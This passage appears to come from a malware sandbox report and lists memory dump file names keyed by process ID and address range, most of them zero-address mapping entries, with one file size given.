                                                                                                                                                                                                                                                                                                                                                            • memory/536-80-0x00007FFFFAC40000-0x00007FFFFB62C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                              9.9MB

                                                                                                                                                                                                                                                                                                                                                            • memory/572-97-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/628-68-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/636-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/800-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/928-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/964-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1000-75-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1000-50-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1136-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1252-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1252-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1276-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1324-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1356-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1356-59-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1360-76-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1364-104-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1364-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1416-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1448-103-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1496-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1536-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1576-73-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1576-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1588-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1588-60-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1692-99-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1724-61-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1724-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1764-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1772-271-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1952-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1960-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1960-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2004-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2096-98-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2100-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2224-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2224-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2248-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2352-74-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2352-106-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2352-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2388-268-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2396-72-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2396-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2404-45-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2668-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2688-47-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2716-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2756-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2760-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2868-52-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2872-70-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2876-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/2976-48-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3104-77-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3200-188-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3292-63-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3300-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3384-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3416-259-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3508-58-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3644-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3656-66-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3720-135-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3828-56-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3828-102-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3840-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3840-186-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3848-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3852-49-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3876-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3904-57-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3908-71-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3908-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3932-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3948-272-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3948-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3960-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3960-65-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/3980-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4024-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4036-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4088-266-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4104-100-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4104-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4116-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4116-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4144-78-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4144-264-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4156-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4156-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4160-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4172-110-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4172-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4180-79-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4196-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4200-81-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4200-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4204-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4220-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4224-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4236-101-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4260-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4280-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4280-82-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4280-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4296-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4296-83-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4316-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4320-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4328-185-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4344-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4356-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4360-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4364-261-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4364-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4384-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4384-249-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4388-260-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4388-109-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4392-84-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4396-252-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4396-85-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4396-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4404-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4420-253-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4424-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4424-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4428-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4436-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4448-265-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4452-250-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4468-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4472-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4496-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4500-86-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4516-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4536-269-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4544-87-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4560-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4576-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4588-88-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4588-254-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4604-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4620-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4624-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4632-107-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4636-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4640-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4648-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4652-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4652-89-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4660-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4664-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4672-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4676-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4684-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4684-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4688-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4688-257-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4700-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4740-90-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4748-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4756-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4764-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4772-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4772-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4784-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4784-190-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4788-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4808-91-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4816-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4820-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4824-267-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4824-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4840-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4844-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4860-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4876-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4880-92-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4888-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4900-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4904-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4920-171-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4928-93-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4928-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4944-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4952-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4952-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4952-95-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4956-180-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/4960-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/5008-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/5044-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/5052-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/5056-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/5064-96-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/5088-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/5104-234-0x0000000000000000-mapping.dmp